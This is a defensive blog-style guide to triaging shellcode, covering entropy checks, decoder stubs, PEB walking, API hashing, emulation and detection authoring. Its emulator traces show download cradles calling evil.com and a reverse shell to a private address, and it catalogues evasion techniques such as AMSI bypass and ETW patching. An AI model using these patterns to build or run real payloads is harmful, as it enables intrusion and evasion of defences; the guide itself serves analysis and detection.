Shellcode Analysis: Tips, Tricks & Common Patterns

A practical guide to analyzing shellcode - identifying encoders, emulation, and recognizing common patterns. Covers triage, PEB walking, hash-based API resolution, scdbg/SpeakEasy emulation, and family-level pattern recognition.

Why Shellcode Analysis Matters

Most modern malware delivery is staged. The first thing that lands on the victim is rarely a full PE - it’s a small position-independent payload (shellcode) whose only job is to bootstrap whatever comes next: download a DLL, reflectively load a beacon, hollow a process, or stage credential theft. From a triage perspective, shellcode is where the campaign’s intent first appears. Decoding even 200 bytes of shellcode often reveals the actor’s tradecraft, the second-stage URL, and the choice of C2 framework before any expensive sandbox detonation.

This post collects the patterns I look for during shellcode triage, the tooling I reach for first, and the common shapes that recur across families.

Quick Triage

Check file entropy first: roughly 4.5-6.5 suggests an encoded body, 6.5-7.5 compression or weak encryption, and 7.5+ strong encryption. Then disassemble with ndisasm as both x86 and x64.

First-Pass Tooling

# Entropy & file shape
ent shellcode.bin
binwalk -E shellcode.bin           # entropy plot
binwalk shellcode.bin              # bundled file scanner

# Disassembly
ndisasm -b 64 shellcode.bin | head
ndisasm -b 32 shellcode.bin | head
rasm2 -a x86 -b 64 -d -f shellcode.bin   # radare2's disassembler

# Strings (post-decode)
strings -a -n 6 shellcode.bin
strings -el shellcode.bin                # little-endian wide strings (UTF-16LE)

# Hash-based identification
sha256sum shellcode.bin
ssdeep shellcode.bin                     # fuzzy hashing for variant clustering

Entropy Heuristics

Entropy (bits/byte)   Interpretation
0.0 - 1.5             Mostly null bytes / fixed pattern - probably padding
1.5 - 4.5             Plain x86/x64 instructions - directly disassemblable
4.5 - 6.5             Encoded (XOR, alphanumeric, single-pass transform)
6.5 - 7.5             Compressed (LZ, RLE) or weakly encrypted
7.5 - 8.0             Strong encryption (AES, RC4 with random key)

Whole-file entropy can mislead - the decoder stub at the start is plain code (low entropy) followed by an encrypted body (high entropy), and the average lands in the encoded range. Always look at windowed entropy (first 64 bytes vs. rest of the file).
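A minimal sketch of the windowed check, using only the standard library. The function names and the 64-byte default window are illustrative choices, not part of any tool mentioned above:

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def windowed_entropy(data: bytes, window: int = 64):
    """Yield (offset, entropy) for consecutive non-overlapping windows."""
    for offset in range(0, len(data), window):
        yield offset, shannon_entropy(data[offset:offset + window])
```

A 64-byte window can never exceed 6.0 bits per byte (log2 of 64), so windowed values are best compared against each other rather than against the whole-file bands. A sharp jump between the first window and the rest is the decoder/body boundary you are looking for.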

Architecture Tells

Disassembling first as x64, then as x86, lets you eyeball which one looks like sane instructions:

  • x64: lots of mov rax, ..., add rsp, ..., 48 ... REX-prefixed bytes.
  • x86: lots of mov eax, ..., push ebp; mov ebp, esp prologues.
  • ARM64: STP X29, X30, [SP, ...] style prologues, no REX bytes.

If neither disassembly looks sensible, you’re looking at encoded data - find the decoder stub.
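The same tell can be approximated at byte level before opening a disassembler. This is a deliberately crude sketch: the marker lists are my own small selection (REX.W-prefixed mov/sub/add/xor for x64; push ebp / mov ebp, esp prologues and FS-prefixed loads for x86), and it will misjudge encoded or very short samples.

```python
# Byte sequences that are common in one mode and rare in the other.
# These lists are illustrative assumptions, not an exhaustive signature set.
X64_MARKERS = (
    b"\x48\x89",      # REX.W mov r/m64, r64
    b"\x48\x8b",      # REX.W mov r64, r/m64
    b"\x48\x83\xec",  # sub rsp, imm8
    b"\x48\x83\xc4",  # add rsp, imm8
    b"\x48\x31",      # REX.W xor r/m64, r64
)
X86_MARKERS = (
    b"\x55\x8b\xec",  # push ebp; mov ebp, esp (MSVC encoding)
    b"\x55\x89\xe5",  # push ebp; mov ebp, esp (GCC/NASM encoding)
    b"\x64\xa1",      # mov eax, fs:[imm32]
    b"\x64\x8b",      # mov reg, fs:[...]
)


def guess_arch(code: bytes) -> str:
    """Return 'x64', 'x86', or 'unknown' based on marker counts."""
    x64 = sum(code.count(m) for m in X64_MARKERS)
    x86 = sum(code.count(m) for m in X86_MARKERS)
    if x64 == x86:
        return "unknown"
    return "x64" if x64 > x86 else "x86"
```

Treat an "unknown" result the same way as two nonsensical disassemblies: it usually means the body is encoded.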

Common Patterns

Look for PEB walking (API resolution), hash-based function lookup (ROR13 for Metasploit), and XOR decoder stubs at the start.

XOR Decoder Stub

The simplest shellcode encoders prepend a short stub (20 bytes in the example below) whose loop walks the body byte by byte, XORing each byte with a fixed key, then jumps to the start of the decoded region. The pattern is unmistakable:

0000  EB 0D              jmp short loc_F
0002 loc_2:
0002  5E                 pop esi              ; esi = address of encoded body (0x14)
0003  31 C9              xor ecx, ecx
0005  B1 87              mov cl, 0x87         ; encoded length
0007 loc_7:
0007  80 36 AA           xor byte ptr [esi], 0xAA   ; XOR key
000A  46                 inc esi              ; 0x46 is inc esi in 32-bit mode only (a REX prefix in 64-bit)
000B  E2 FA              loop loc_7
000D  EB 05              jmp short loc_14
000F loc_F:
000F  E8 EE FF FF FF     call loc_2           ; pushes 0x14, the address of the body
0014 loc_14:
... encoded body ...

The “call/pop” trick is the position-independent way to learn the address of the encoded body. After the loop, control transfers into the decoded code. Once you spot the structure, the XOR key (0xAA here) and length (0x87) are static parameters - apply them in CyberChef or a 3-line Python script and disassemble the result.
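The short Python script mentioned above could look like the following sketch. The function name is mine; the offset (0x14), length (0x87), and key (0xAA) are the values read from the example stub and would differ per sample:

```python
def xor_decode(blob: bytes, body_offset: int, length: int, key: int) -> bytes:
    """Decode `length` bytes starting at `body_offset` with a single-byte XOR key."""
    body = blob[body_offset:body_offset + length]
    if len(body) < length:
        raise ValueError("blob is shorter than the encoded length in the stub")
    return bytes(b ^ key for b in body)


# Example use against the stub shown above (file names are placeholders):
#   blob = open("shellcode.bin", "rb").read()
#   decoded = xor_decode(blob, body_offset=0x14, length=0x87, key=0xAA)
#   open("decoded.bin", "wb").write(decoded)
```

Write the decoded body to its own file and disassemble that file from offset 0, so addresses in the listing are relative to the real payload rather than to the stub.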

Common alphanumeric encoders (Metasploit’s x86/alpha_mixed) use multi-pass transforms producing only printable ASCII bytes - they’re characterised by a tiny constructor at the very beginning followed by long runs of [A-Za-z0-9].

PEB Walking (API Resolution)

Shellcode cannot import anything by name - there’s no PE loader to fix up imports. Instead, it walks the Process Environment Block to find loaded modules. The structure on x64:

GS:[0x60]      → PEB
PEB.Ldr        → PEB_LDR_DATA
PEB.Ldr.InMemoryOrderModuleList  → linked list of LDR_DATA_TABLE_ENTRY
                                    (one per loaded DLL)

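LDR_DATA_TABLE_ENTRY:
    +0x000 InLoadOrderLinks       (LIST_ENTRY)
    +0x010 InMemoryOrderLinks     (LIST_ENTRY)
    +0x020 InInitializationOrderLinks
    +0x030 DllBase
    +0x048 FullDllName            (UNICODE_STRING)
    +0x058 BaseDllName            (UNICODE_STRING)

    (InMemoryOrderModuleList pointers land on +0x010 of each entry, so code
     walking that list sees DllBase at +0x20 and BaseDllName at +0x48.)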

The recognisable assembly:

mov rdx, gs:[0x60]              ; PEB
mov rdx, [rdx + 0x18]           ; PEB.Ldr
mov rdx, [rdx + 0x20]           ; InMemoryOrderModuleList head
                                ; (next: walk LIST_ENTRY pointers, cmp BaseDllName)

x86 equivalent uses FS:[0x30] and offsets 0x0C, 0x14. Once you see FS:[0x30] or GS:[0x60] in the first few instructions, you’re looking at PEB walking - that’s API resolution.
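Because the PEB load has only a handful of encodings, it can be located with a byte-pattern scan before disassembling anything. The sketch below is an assumption-laden starting point: the four patterns cover the absolute and register-relative forms I would expect, with the register-selecting ModRM byte wildcarded, and the loose wildcard can produce occasional false positives.

```python
import re

# Patterns are written as regexes over raw bytes. The ModRM byte that selects
# the destination/base register is wildcarded, so any register matches.
PEB_PATTERNS = {
    "x86 mov eax, fs:[0x30]": re.compile(rb"\x64\xa1\x30\x00\x00\x00"),
    "x86 mov reg, fs:[reg+0x30]": re.compile(rb"\x64\x8b[\x40-\x7f]\x30"),
    "x64 mov reg, gs:[0x60]": re.compile(
        rb"\x65\x48\x8b[\x04\x0c\x14\x1c\x24\x2c\x34\x3c]\x25\x60\x00\x00\x00"
    ),
    "x64 mov reg, gs:[reg+0x60]": re.compile(rb"\x65\x48\x8b[\x40-\x7f]\x60"),
}


def find_peb_access(code: bytes):
    """Return a sorted list of (offset, description) for every PEB-load match."""
    hits = []
    for label, pattern in PEB_PATTERNS.items():
        for match in pattern.finditer(code):
            hits.append((match.start(), label))
    return sorted(hits)
```

A hit in the first few dozen bytes is a strong hint that the sample is unencoded; a hit only after decoding confirms you stripped the stub correctly.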

Hash-Based Function Lookup (ROR13)

After locating kernel32.dll’s base, the shellcode walks the export directory comparing API name hashes (not strings - hardcoded strings would be a YARA bonanza) against pre-computed constants.

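The Metasploit block_api.asm family uses ROR-13. A simplified version of the hashing loop is shown below; block_api itself also rotates once more for the terminating NUL and adds a ROR-13 hash of the upper-cased module name, which is why its constants differ from plain ROR-13 tables:

mov edi, [rsi + 0x20]      ; AddressOfNames RVA (rsi = export directory here)
...                        ; (rsi is repointed at the current export name)
xor eax, eax               ; eax = running hash
loop_byte:
    movzx edx, byte ptr [rsi]  ; next character of the name
    cmp dl, dh                 ; end of string? (dh is 0 after movzx)
    jz hash_done
    ror eax, 13                ; rotate-right by 13
    add eax, edx
    inc rsi
    jmp loop_byte
hash_done: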

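Recognisable hashes (block_api style, module and function combined):

Hash        API
0x0726774C  kernel32.dll!LoadLibraryA
0x7802F749  kernel32.dll!GetProcAddress
0xE553A458  kernel32.dll!VirtualAlloc
0xE0DF0FEA  ws2_32.dll!WSASocketA
0x006B8029  ws2_32.dll!WSAStartup
0x6174A599  ws2_32.dll!connect
0x863FCC79  kernel32.dll!CreateProcessA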

A search through the raw shellcode bytes for any of these 4-byte values (stored little-endian, so 0x0726774C appears as 4C 77 26 07) immediately tells you the shellcode’s planned API set; shellcode has no .data section to narrow the search. Other families use FNV-1a, djb2, or custom polynomial hashes - the principle is identical, just with different constants.
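To check a constant or build your own lookup table, the hash can be reproduced in a few lines. This sketch follows my reading of the block_api scheme: ROR-13 over the upper-cased UTF-16LE module name including its terminator, plus ROR-13 over the ASCII function name including its terminator, truncated to 32 bits. The function names are mine.

```python
import struct


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits`."""
    value &= 0xFFFFFFFF
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def ror13_string(data: bytes) -> int:
    """Plain ROR-13 additive hash over a byte string."""
    h = 0
    for byte in data:
        h = (ror32(h, 13) + byte) & 0xFFFFFFFF
    return h


def block_api_hash(module: str, function: str) -> int:
    """Combined module + function hash in the block_api style."""
    # Module name: upper-cased, UTF-16LE, terminating NUL included.
    mod_bytes = (module.upper() + "\x00").encode("utf-16-le")
    # Function name: ASCII, case preserved, terminating NUL included.
    func_bytes = (function + "\x00").encode("ascii")
    return (ror13_string(mod_bytes) + ror13_string(func_bytes)) & 0xFFFFFFFF


def find_hash_constants(blob: bytes, table: dict) -> dict:
    """Map API name -> first offset where its little-endian hash occurs in blob."""
    found = {}
    for name, value in table.items():
        offset = blob.find(struct.pack("<I", value))
        if offset >= 0:
            found[name] = offset
    return found
```

Generating the table from a list of (module, export) pairs and feeding it to find_hash_constants gives a quick capability summary without emulation. A 4-byte match can occur by chance, so confirm hits in the disassembly.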

Egghunter / Tag-Search Shellcode

A 30-40 byte stub that scans process memory for a 4-byte tag placed twice back to back (e.g. w00t, giving the 8-byte egg w00tw00t) and jumps to whatever follows it. Used when the initial buffer is too small for full code but a larger buffer was placed elsewhere in the process. Recognisable by NtAccessCheckAndAuditAlarm (the syscall used by Skape’s classic egghunter to validate readable memory).
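The search logic is easy to replay offline against a memory dump to find where the real payload starts. A minimal sketch, with a hypothetical function name and the w00t tag from the example as the default:

```python
def hunt_egg(memory: bytes, tag: bytes = b"w00t") -> int:
    """Return the offset of the payload that follows the doubled tag, or -1."""
    if len(tag) != 4:
        raise ValueError("egghunter tags are 4 bytes long")
    egg = tag * 2  # the tag must appear twice, back to back
    position = memory.find(egg)
    return -1 if position < 0 else position + len(egg)
```

The tag is doubled because the hunter stub itself contains one copy of it; requiring two consecutive copies stops the stub from matching its own bytes.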

Stack Strings

Even with API hashing, shellcode still needs a few literal strings (e.g. URLs, registry keys). They show up as repeated mov dword ptr [rsp+...], 0xCONSTANT sequences building a string on the stack one DWORD at a time:

mov dword [rsp+0x00], 0x70747468   ; "http"
mov dword [rsp+0x04], 0x2F2F3A73   ; "s://"
...

Byte-swap each constant (the immediates are little-endian) and concatenate them in stack-offset order, and you have the raw string.
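In Python the byte-swap and join is one struct call per constant. The helper below is a sketch with a name of my choosing; it assumes the constants are listed in ascending stack-offset order and that the string is ASCII:

```python
import struct


def decode_stack_dwords(constants) -> str:
    """Rebuild a stack string from DWORD immediates listed in stack-offset order."""
    raw = b"".join(struct.pack("<I", c) for c in constants)
    # Stop at the first NUL, which terminates the string on the stack.
    return raw.split(b"\x00", 1)[0].decode("ascii", errors="replace")
```

For the two constants shown above, decode_stack_dwords([0x70747468, 0x2F2F3A73]) returns "https://".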

Dynamic Analysis

Use scdbg to emulate execution and hook API calls - immediately reveals reverse shells, download cradles, and process injection.

scdbg

scdbg (David Zimmer) is the workhorse for x86 shellcode emulation:

scdbg /f shellcode.bin
# 401029  LoadLibraryA(WS2_32)
# 40103D  WSAStartup(MAKEWORD(2,2),0x4011a0)
# 40104B  WSASocketA(2,1,0,0,0,0)
# 401059  connect(192.168.1.50:4444) = -1 (no real network)
# 401067  CreateProcessA(cmd.exe)
# Stepcount 247

Within seconds you have the C2 host, port, and capability summary. Useful flags:

  • /findsc to scan a buffer for likely shellcode entry points.
  • /api to scan memory and try to locate a resolved API table.
  • /foff <hex> to start emulation from a specific offset (skip the decoder if you’ve already extracted the body).

scdbg is x86-only. For x64 use SpeakEasy (Mandiant), which emulates both.

SpeakEasy

speakeasy -t shellcode.bin -a x64 -r
# 0x10000000  VirtualAlloc(0, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE) → 0x10001000
# 0x10000020  InternetOpenA("Mozilla/5.0...")
# 0x10000040  InternetConnectA("evil.com",443,...)
# 0x10000080  HttpOpenRequestA(GET, "/payload.bin")
# 0x100000a0  HttpSendRequestA(...)

SpeakEasy’s strengths are x64 support, a more complete Windows API surface, and a Python plugin model for extending coverage.

Unicorn / Qiling

For non-Windows shellcode (Linux, BSD) or for very custom analysis (replacing API stubs with your own logic), Unicorn and Qiling provide programmatic CPU emulation:

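from qiling import Qiling
from qiling.const import QL_ARCH, QL_OS, QL_VERBOSE

shellcode = open("shellcode.bin", "rb").read()   # raw bytes, not a PE on disk
# code= loads a raw buffer; archtype/ostype are required because there is no header to sniff
ql = Qiling(code=shellcode, rootfs="rootfs/x86_windows",
            archtype=QL_ARCH.X86, ostype=QL_OS.WINDOWS, verbose=QL_VERBOSE.DEBUG)
ql.run()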

You can emulate a Win32 or POSIX environment, hook arbitrary instructions or addresses, and dump memory at chosen breakpoints.

Live Debugger Approach

For complex shellcode that an emulator can’t handle (heavy SEH usage, syscalls, in-line mov cr3 style anti-emulation tricks):

  1. Compile a minimal loader.c that VirtualAllocs RWX memory, copies the shellcode in, and calls __debugbreak() just before jumping to it.
  2. Run the loader under x64dbg / WinDbg (or attach when the breakpoint fires).
  3. From the breakpoint, single-step into the shellcode in the real Windows environment.

This is slower than emulation but defeats every anti-emulation trick because you’re running on a real CPU with a real kernel.

Decoder/Transform Catalogue

Pattern             Indicator
Reverse shell       WSASocketA → connect → CreateProcessA
Download & exec     URLDownloadToFileA chain
Reflective DLL      VirtualAlloc → manual PE loading
Process injection   OpenProcess → VirtualAllocEx → WriteProcessMemory

Adding the most common families I see in 2025-2026 samples:

Pattern                         Recognisable API chain
Reverse TCP shell               WSAStartup → WSASocketA → connect → CreateProcessA(cmd.exe) with redirected STARTUPINFO
Bind shell                      WSAStartup → bind → listen → accept → CreateProcessA
HTTP/S download cradle          LoadLibraryA(wininet) → InternetOpenA → InternetConnectA → HttpOpenRequestA → HttpSendRequestA → InternetReadFile
Reflective DLL loader           VirtualAlloc(RW) → custom loader walks PE → VirtualProtect(RX) → indirect call
Process hollowing               CreateProcessA(...,CREATE_SUSPENDED) → NtUnmapViewOfSection → VirtualAllocEx → WriteProcessMemory → SetThreadContext → ResumeThread
Process injection (classic)     OpenProcess → VirtualAllocEx → WriteProcessMemory → CreateRemoteThread
AMSI bypass shellcode           GetProcAddress(amsi.dll, AmsiScanBuffer) → VirtualProtect → patch entry to mov eax, 0x80070057; ret
ETW patch                       GetProcAddress(ntdll, EtwEventWrite) → VirtualProtect → patch ret
Direct/indirect syscall stubs   mov rax, <SSN>; mov r10, rcx; syscall; ret (direct) or mov r11, <NtFunc+0x12>; call r11 (indirect)
Cobalt Strike stage 0           RC4-decrypted body of ~256 KB; LoadLibraryA(wininet) + checksum 0xC691A8FB-style hashes
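Once an emulator has produced an ordered list of API names, matching it against these chains can be automated. The sketch below encodes a few rows of the table as ordered lists and tests whether each chain occurs as a subsequence of the trace, so unrelated calls in between do not break the match. The dictionary and function names are illustrative.

```python
# A subset of the table above, expressed as ordered API chains.
PATTERNS = {
    "Reverse TCP shell": ["WSAStartup", "WSASocketA", "connect", "CreateProcessA"],
    "Bind shell": ["WSAStartup", "bind", "listen", "accept", "CreateProcessA"],
    "HTTP/S download cradle": [
        "InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
        "HttpSendRequestA", "InternetReadFile",
    ],
    "Process hollowing": [
        "CreateProcessA", "NtUnmapViewOfSection", "VirtualAllocEx",
        "WriteProcessMemory", "SetThreadContext", "ResumeThread",
    ],
    "Process injection (classic)": [
        "OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
    ],
}


def is_subsequence(chain, trace) -> bool:
    """True if every API in `chain` appears in `trace` in the same order."""
    remaining = iter(trace)
    # `api in remaining` consumes the iterator up to the match, preserving order.
    return all(api in remaining for api in chain)


def classify_trace(trace):
    """Return the names of all patterns whose chain is present in the trace."""
    return [name for name, chain in PATTERNS.items() if is_subsequence(chain, trace)]
```

Subsequence matching is intentionally forgiving; a sample that resolves everything through GetProcAddress first will still match as long as the calls themselves appear in order.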

A Quick Worked Example

A 312-byte sample lands on your desk. First-pass scdbg run:

scdbg /f sample.bin
401000  GetProcAddress(0x77E80000, "LoadLibraryA")
401016  GetProcAddress(0x77E80000, "GetProcAddress")
40102C  LoadLibraryA(WININET)
401040  GetProcAddress(WININET, "InternetOpenA")
401055  GetProcAddress(WININET, "InternetConnectA")
40106A  GetProcAddress(WININET, "HttpOpenRequestA")
401080  GetProcAddress(WININET, "HttpSendRequestA")
401096  GetProcAddress(WININET, "InternetReadFile")
4010A2  InternetOpenA("Mozilla/5.0 (Windows NT 10.0)")
4010BC  InternetConnectA("evil.com", 443, NULL, NULL, INTERNET_SERVICE_HTTP)
4010D8  HttpOpenRequestA(hConnect, "GET", "/u.bin")
...

Triage verdict in under a minute: HTTPS download cradle pulling a second stage from evil.com:443/u.bin. That single URL becomes the next IOC; pivot in passive DNS / VirusTotal / URLScan to find the campaign perimeter.
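Pulling the host, port, and path out of a trace like this is worth scripting when you have many samples. The parser below is a sketch that assumes the line layout shown in the listing above (hex address, API name, parenthesised arguments); real emulator output may be formatted differently, and the function names are mine.

```python
import re

# "<hex address>  ApiName(arguments)" as laid out in the listing above.
CALL_RE = re.compile(r"^\s*[0-9A-Fa-f]+\s+(\w+)\((.*)\)\s*$")
STRING_RE = re.compile(r'"([^"]*)"')
PORT_RE = re.compile(r'",\s*(\d+)')


def parse_trace(text: str):
    """Return a list of (api_name, raw_argument_string) tuples."""
    calls = []
    for line in text.splitlines():
        match = CALL_RE.match(line)
        if match:
            calls.append((match.group(1), match.group(2)))
    return calls


def extract_http_iocs(text: str) -> dict:
    """Collect host/port from InternetConnectA and path from HttpOpenRequestA."""
    iocs = {"host": None, "port": None, "path": None}
    for api, args in parse_trace(text):
        strings = STRING_RE.findall(args)
        if api == "InternetConnectA" and strings:
            iocs["host"] = strings[0]
            port = PORT_RE.search(args)
            iocs["port"] = int(port.group(1)) if port else None
        elif api == "HttpOpenRequestA" and len(strings) >= 2:
            iocs["path"] = strings[1]  # first string is the verb, second the object
    return iocs
```

Run against the trace above, this yields host evil.com, port 443, and path /u.bin, which is the same URL used for pivoting.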

Practical Workflow Checklist

A repeatable triage that finishes most samples in 30 minutes:

  1. Hash + classify. SHA-256 → VT lookup → first-seen, family hits.
  2. Entropy + windowed entropy. Locate decoder vs body boundary.
  3. Disassemble the first instructions. PEB walk? Hash lookup? Decoder stub?
  4. Emulate (scdbg/SpeakEasy). Capture API trace.
  5. Decode + re-disassemble if there was a decoder stub.
  6. Identify family / framework. Metasploit? Cobalt Strike? Sliver? Custom?
  7. Extract IOCs. URLs, hostnames, ports, mutex names, file paths.
  8. Author detections. YARA on invariant bytes (hash constants, decoder shape); Sigma on the host-side spawn pattern.

Shellcode is rarely the whole attack - it’s the bridge. But the bridge always reveals the destination. Spend 15 minutes on the shellcode and you’ll often save hours of sandbox-driven black-box analysis.
